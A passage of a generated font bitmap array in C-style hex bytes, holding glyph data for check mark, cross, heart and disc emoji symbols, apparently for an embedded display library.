0x0, 0xff, 0xff, 0xff, 0xe0, 0x3f, 0xff, 0xf8,
0x0, 0xff, 0xff, 0xff, 0xe0, 0xf, 0xff, 0xf8,
0x0, 0x7f, 0xff, 0xff, 0xf0, 0x7, 0xff, 0xf8,
0x0, 0x7f, 0xff, 0xff, 0xf8, 0x3, 0xff, 0xfc,
0x0, 0x7f, 0xff, 0xff, 0xfc, 0x0, 0xff, 0xfc,
0x0, 0x7f, 0xff, 0xff, 0xff, 0x0, 0x7f, 0xfc,
0x0, 0x7f, 0xff, 0xff, 0xff, 0x80, 0x3f, 0xfc,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xc0, 0xf, 0xfc,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xf0, 0x7, 0xfe,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xf8, 0x1, 0xfe,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xfc, 0x0, 0xfe,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0x0, 0x7e,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0x80, 0x1e,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xf,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x7,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x1,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+2714 "✔" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xf0, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xf0, 0x1, 0xff, 0x80, 0x0, 0x0, 0x3f,
0xff, 0xf8, 0x1, 0xff, 0xe0, 0x0, 0x0, 0x3f,
0xff, 0xf8, 0x0, 0xff, 0xf0, 0x0, 0x0, 0x3f,
0xff, 0xf8, 0x0, 0xff, 0xfc, 0x0, 0x0, 0x1f,
0xff, 0xf8, 0x0, 0x7f, 0xfe, 0x0, 0x0, 0x1f,
0xff, 0xf8, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x1f,
0xff, 0xfc, 0x0, 0x1f, 0xff, 0xc0, 0x0, 0x1f,
0xff, 0xfc, 0x0, 0xf, 0xff, 0xe0, 0x0, 0x1f,
0xff, 0xfc, 0x0, 0x7, 0xff, 0xf0, 0x0, 0xf,
0xff, 0xfc, 0x0, 0x1, 0xff, 0xfc, 0x0, 0xf,
0xff, 0xfc, 0x0, 0x0, 0xff, 0xfe, 0x0, 0xf,
0xff, 0xfe, 0x0, 0x0, 0x7f, 0xff, 0x0, 0xf,
0xff, 0xfe, 0x0, 0x0, 0x1f, 0xff, 0xc0, 0xf,
0xff, 0xfe, 0x0, 0x0, 0xf, 0xff, 0xe0, 0x7,
0xff, 0xfe, 0x0, 0x0, 0x7, 0xff, 0xf0, 0x7,
0xff, 0xfe, 0x0, 0x0, 0x1, 0xff, 0xfc, 0x7,
0xff, 0xfe, 0x0, 0x0, 0x0, 0xff, 0xfe, 0x7,
0xff, 0xff, 0x0, 0x0, 0x0, 0x7f, 0xff, 0x7,
0xff, 0xff, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xc7,
0xff, 0xff, 0x0, 0x0, 0x0, 0xf, 0xff, 0xe3,
0xff, 0xff, 0x0, 0x0, 0x0, 0x7, 0xff, 0xf3,
0xff, 0xff, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0xff, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0,
/* U+2716 "✖" */
0x0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x60, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x3,
0xfc, 0x0, 0x0, 0x0, 0x7, 0xf8, 0x0, 0x3f,
0xf0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x3, 0xff,
0xc0, 0x0, 0x0, 0x7, 0xff, 0x80, 0x3f, 0xff,
0x0, 0x0, 0x0, 0x7f, 0xfe, 0x3, 0xff, 0xfc,
0x0, 0x0, 0x7, 0xff, 0xf8, 0x3f, 0xff, 0xf0,
0x0, 0x0, 0x7f, 0xff, 0xe3, 0xff, 0xff, 0xc0,
0x0, 0x7, 0xff, 0xff, 0x9f, 0xff, 0xff, 0x0,
0x0, 0x7f, 0xff, 0xfe, 0xff, 0xff, 0xfc, 0x0,
0x7, 0xff, 0xff, 0xe3, 0xff, 0xff, 0xf0, 0x0,
0x7f, 0xff, 0xfe, 0xf, 0xff, 0xff, 0xc0, 0x7,
0xff, 0xff, 0xe0, 0x3f, 0xff, 0xff, 0x0, 0x7f,
0xff, 0xfe, 0x0, 0xff, 0xff, 0xfc, 0x7, 0xff,
0xff, 0xe0, 0x3, 0xff, 0xff, 0xf0, 0x7f, 0xff,
0xfe, 0x0, 0xf, 0xff, 0xff, 0xc7, 0xff, 0xff,
0xe0, 0x0, 0x3f, 0xff, 0xff, 0x7f, 0xff, 0xfe,
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x3, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x3f, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x3,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x3, 0xff, 0xff, 0xef, 0xff, 0xff, 0xc0,
0x0, 0x3f, 0xff, 0xfe, 0x3f, 0xff, 0xff, 0x0,
0x3, 0xff, 0xff, 0xe0, 0xff, 0xff, 0xfc, 0x0,
0x3f, 0xff, 0xfe, 0x3, 0xff, 0xff, 0xf0, 0x3,
0xff, 0xff, 0xe0, 0xf, 0xff, 0xff, 0xc0, 0x3f,
0xff, 0xfe, 0x0, 0x3f, 0xff, 0xff, 0x3, 0xff,
0xff, 0xe0, 0x0, 0xff, 0xff, 0xfc, 0x3f, 0xff,
0xfe, 0x0, 0x3, 0xff, 0xff, 0xf3, 0xff, 0xff,
0xe0, 0x0, 0xf, 0xff, 0xff, 0xdf, 0xff, 0xfe,
0x0, 0x0, 0x3f, 0xff, 0xfc, 0x7f, 0xff, 0xe0,
0x0, 0x0, 0xff, 0xff, 0xc1, 0xff, 0xfe, 0x0,
0x0, 0x3, 0xff, 0xfc, 0x7, 0xff, 0xe0, 0x0,
0x0, 0xf, 0xff, 0xc0, 0x1f, 0xfe, 0x0, 0x0,
0x0, 0x3f, 0xfc, 0x0, 0x7f, 0xe0, 0x0, 0x0,
0x0, 0xff, 0xc0, 0x1, 0xfe, 0x0, 0x0, 0x0,
0x3, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0xf, 0xc0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x60, 0x0, 0x0, 0x0, 0x0,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0,
/* U+274C "❌" */
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf, 0xf1,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xf3,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0xff, 0xef,
0xff, 0x80, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0xf, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x0, 0xff, 0xff, 0x7f,
0xff, 0x80, 0x0, 0x0, 0x3, 0xff, 0xfc, 0xff,
0xff, 0x80, 0x0, 0x0, 0xf, 0xff, 0xf8, 0xff,
0xff, 0x80, 0x0, 0x0, 0x3f, 0xff, 0xe0, 0xff,
0xff, 0x80, 0x0, 0x0, 0xff, 0xff, 0x80, 0xff,
0xff, 0x80, 0x0, 0x3, 0xff, 0xfe, 0x0, 0xff,
0xff, 0x80, 0x0, 0x1f, 0xff, 0xf8, 0x0, 0xff,
0xff, 0xc0, 0x0, 0x7f, 0xff, 0xe0, 0x0, 0xff,
0xff, 0xc0, 0x1, 0xff, 0xff, 0x80, 0x0, 0xff,
0xff, 0xc0, 0x7, 0xff, 0xfe, 0x0, 0x0, 0xff,
0xff, 0xc0, 0x1f, 0xff, 0xf8, 0x0, 0x0, 0xff,
0xff, 0xc0, 0x7f, 0xff, 0xe0, 0x0, 0x0, 0xff,
0xff, 0xc1, 0xff, 0xff, 0x80, 0x0, 0x0, 0xff,
0xff, 0xc7, 0xff, 0xfe, 0x0, 0x0, 0x0, 0xff,
0xff, 0xdf, 0xff, 0xf8, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x7, 0xff, 0xfe, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x1f, 0xff, 0xf8, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x7f, 0xff, 0xe0, 0xff,
0xff, 0xc0, 0x0, 0x1, 0xff, 0xff, 0x80, 0xff,
0xff, 0xc0, 0x0, 0x7, 0xff, 0xfe, 0x0, 0xff,
0xff, 0xc0, 0x0, 0x1f, 0xff, 0xf8, 0x0, 0xff,
0xff, 0xc0, 0x0, 0x7f, 0xff, 0xe0, 0x0, 0xff,
0xff, 0xc0, 0x1, 0xff, 0xff, 0x80, 0x0, 0xff,
0xff, 0xc0, 0x7, 0xff, 0xfe, 0x0, 0x0, 0x7f,
0xff, 0xc0, 0x1f, 0xff, 0xf0, 0x0, 0x0, 0x7f,
0xff, 0xc0, 0x7f, 0xff, 0xc0, 0x0, 0x0, 0x7f,
0xff, 0xc1, 0xff, 0xff, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xc7, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xcf, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xbf, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xfd, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xf3, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xe3, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0x81, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0,
/* U+2764 "❤" */
0x0, 0xf, 0xff, 0x0, 0x0, 0x1, 0xff, 0xe0,
0x0, 0x0, 0x7f, 0xff, 0x80, 0x0, 0xf, 0xff,
0xf0, 0x0, 0x3, 0xf1, 0xcf, 0xc0, 0x0, 0x7e,
0x39, 0xf8, 0x0, 0xf, 0x83, 0x83, 0xe0, 0x3,
0xe0, 0x70, 0xf8, 0x0, 0x3e, 0x7, 0x7, 0xe0,
0xf, 0xc0, 0xe0, 0xf8, 0x0, 0xfc, 0xe, 0xf,
0xe0, 0x3f, 0x81, 0xc1, 0xf8, 0x3, 0xf8, 0x1c,
0x1d, 0xe0, 0xf7, 0x3, 0x83, 0xf8, 0xf, 0x70,
0x38, 0x39, 0xe3, 0xce, 0x7, 0x7, 0x78, 0x1c,
0xe0, 0x70, 0x71, 0xc7, 0x1c, 0xe, 0xe, 0x70,
0x71, 0xc0, 0xe0, 0xe1, 0xdc, 0x38, 0x1c, 0x1c,
0x70, 0xe3, 0x81, 0xc1, 0xc1, 0xb0, 0x70, 0x38,
0x38, 0xe3, 0x87, 0x3, 0x83, 0x83, 0xe0, 0xe0,
0x70, 0x70, 0xe7, 0xe, 0x7, 0x7, 0x3, 0x81,
0xc0, 0xe0, 0xe1, 0xce, 0x1c, 0xe, 0xe, 0x7,
0x3, 0x81, 0xc1, 0xc3, 0xb8, 0x38, 0x1c, 0x1c,
0xe, 0x7, 0x3, 0x83, 0x83, 0xf0, 0x70, 0x38,
0x38, 0x1c, 0xe, 0x7, 0x7, 0x7, 0xe0, 0xe0,
0x70, 0x70, 0x38, 0x1c, 0xe, 0xe, 0xf, 0xc1,
0xc0, 0xe0, 0xe0, 0x70, 0x38, 0x1c, 0x1c, 0x1f,
0x83, 0x81, 0xc1, 0xc0, 0xe0, 0x70, 0x38, 0x38,
0x3f, 0x7, 0x3, 0x83, 0x81, 0xc0, 0xe0, 0x70,
0x70, 0x7e, 0xe, 0x7, 0x7, 0x3, 0x81, 0xc0,
0xe0, 0xe0, 0xfc, 0x1c, 0xe, 0xe, 0x7, 0x3,
0x81, 0xc1, 0xc1, 0xf8, 0x38, 0x1c, 0x1c, 0xe,
0x7, 0x3, 0x83, 0x83, 0xf8, 0x70, 0x38, 0x38,
0x1c, 0xe, 0x7, 0x7, 0xe, 0x70, 0xe0, 0x70,
0x70, 0x38, 0x1c, 0xe, 0xe, 0x1c, 0xe1, 0xc0,
0xe0, 0xe0, 0x70, 0x38, 0x1c, 0x1c, 0x39, 0xc3,
0x81, 0xc1, 0xc0, 0xe0, 0x70, 0x38, 0x38, 0xf1,
0xc7, 0x3, 0x83, 0x81, 0xc0, 0xe0, 0x70, 0x71,
0xc3, 0x8e, 0x7, 0x7, 0x3, 0x81, 0xc0, 0xe0,
0xe3, 0x87, 0x9c, 0xe, 0xe, 0x7, 0x3, 0x81,
0xc1, 0xcf, 0x7, 0x38, 0x1c, 0x1c, 0xe, 0x7,
0x3, 0x83, 0x9c, 0xf, 0x70, 0x38, 0x38, 0x1c,
0xe, 0x7, 0x7, 0x78, 0xe, 0xe0, 0x70, 0x70,
0x38, 0x1c, 0xe, 0xe, 0xe0, 0x1f, 0xc0, 0xe0,
0xe0, 0x70, 0x38, 0x1c, 0x1f, 0xc0, 0x1f, 0x81,
0xc1, 0xc0, 0xe0, 0x70, 0x38, 0x3f, 0x0, 0x1f,
0x3, 0x83, 0x81, 0xc0, 0xe0, 0x70, 0x7c, 0x0,
0x3e, 0x7, 0x7, 0x3, 0x81, 0xc0, 0xe0, 0xf8,
0x0, 0x3c, 0xe, 0xe, 0x7, 0x3, 0x81, 0xc1,
0xe0, 0x0, 0x38, 0x1c, 0x1c, 0xe, 0x7, 0x3,
0x83, 0x80, 0x0, 0x38, 0x38, 0x38, 0x1c, 0xe,
0x7, 0xe, 0x0, 0x0, 0x78, 0x70, 0x70, 0x38,
0x1c, 0xe, 0x3c, 0x0, 0x0, 0x78, 0xe0, 0xe0,
0x70, 0x38, 0x1c, 0xf0, 0x0, 0x0, 0x79, 0xc1,
0xc0, 0xe0, 0x70, 0x3b, 0xc0, 0x0, 0x0, 0x73,
0x83, 0x81, 0xc0, 0xe0, 0x7f, 0x0, 0x0, 0x0,
0x77, 0x7, 0x3, 0x81, 0xc0, 0xfc, 0x0, 0x0,
0x0, 0x7e, 0xe, 0x7, 0x3, 0x81, 0xf0, 0x0,
0x0, 0x0, 0x7c, 0x1c, 0xe, 0x7, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x78, 0x38, 0x1c, 0xe, 0x7,
0x0, 0x0, 0x0, 0x0, 0x70, 0x70, 0x38, 0x1c,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x70,
0x38, 0x70, 0x0, 0x0, 0x0, 0x0, 0x71, 0xc0,
0xe0, 0x73, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x7b,
0x81, 0xc0, 0xef, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7f, 0x3, 0x81, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0x7, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7c, 0xe, 0x7, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x1c, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x38, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x71, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0xe7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d,
0xde, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x10, 0x0, 0x0, 0x0,
0x0,
/* U+FE0F "️" */
0x0,
/* U+1F4C0 "📀" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x0, 0x1f, 0x7f, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x1e, 0x1f, 0xff, 0xff, 0xff, 0xf0,
0x0, 0x0, 0x1e, 0xf, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x1e, 0x3, 0xff, 0xff, 0xff, 0xff,
0x0, 0x0, 0x1c, 0x1, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x1c, 0x0, 0x7f, 0xff, 0xff, 0xff,
0xf0, 0x0, 0x1c, 0x0, 0x3f, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x1e, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0x0, 0x1e, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xc0, 0xe, 0x0, 0x3, 0xff, 0xff, 0xff,
0xff, 0xe0, 0xf, 0xc0, 0x0, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x7, 0xf0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xfc, 0x7, 0xfe, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0x3, 0xff, 0x80, 0xf, 0xff, 0xff,
0xff, 0xff, 0x83, 0xff, 0xe0, 0xf, 0x80, 0xff,
0xff, 0xff, 0xe1, 0xff, 0xfc, 0xf, 0x0, 0x1f,
0xff, 0xff, 0xf0, 0xff, 0xff, 0xe, 0x0, 0x3,
0xff, 0xff, 0xf8, 0xff, 0xff, 0xee, 0x0, 0x0,
0xff, 0xff, 0xfe, 0x7f, 0xff, 0xfe, 0x0, 0x0,
0x3f, 0xff, 0xff, 0x3f, 0xff, 0xfe, 0x3, 0xf0,
0xf, 0xff, 0xff, 0x9f, 0xff, 0xff, 0x3, 0xfc,
0x7, 0xff, 0xff, 0xdf, 0xff, 0xff, 0x3, 0xff,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0x83, 0xff,
0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x83, 0xff,
0xf0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xc1, 0xff,
0xf8, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xe0, 0xff,
0xfc, 0xf, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x7f,
0xfe, 0x7, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x3f,
0xff, 0x3, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x1f,
0xff, 0x81, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7,
0xff, 0x80, 0xff, 0xff, 0xff, 0xff, 0xff, 0x81,
0xff, 0x80, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x7f, 0x80, 0x7f, 0xff, 0xfd, 0xff, 0xff, 0xf0,
0x1f, 0x80, 0x7f, 0xff, 0xfc, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x3f, 0xff, 0xfe, 0x7f, 0xff, 0xfe,
0x0, 0x0, 0x3f, 0xff, 0xff, 0x3f, 0xff, 0xff,
0x80, 0x0, 0x3b, 0xff, 0xff, 0x8f, 0xff, 0xff,
0xe0, 0x0, 0x38, 0x7f, 0xff, 0x87, 0xff, 0xff,
0xfc, 0x0, 0x78, 0x1f, 0xff, 0xc3, 0xff, 0xff,
0xff, 0x80, 0xf0, 0x3, 0xff, 0xe0, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x0, 0xff, 0xe0, 0x7f, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x1f, 0xf0, 0x1f, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x7, 0xf0, 0xf, 0xff,
0xff, 0xff, 0xff, 0x0, 0x1, 0xf8, 0x3, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x0, 0x38, 0x1, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x0, 0x3c, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x3c, 0x0, 0x1f,
0xff, 0xff, 0xff, 0xfc, 0x0, 0x3c, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0x0, 0x3c, 0x0, 0x1,
0xff, 0xff, 0xff, 0xff, 0x80, 0x3c, 0x0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xe0, 0x3c, 0x0, 0x0,
0x1f, 0xff, 0xff, 0xff, 0xf0, 0x3c, 0x0, 0x0,
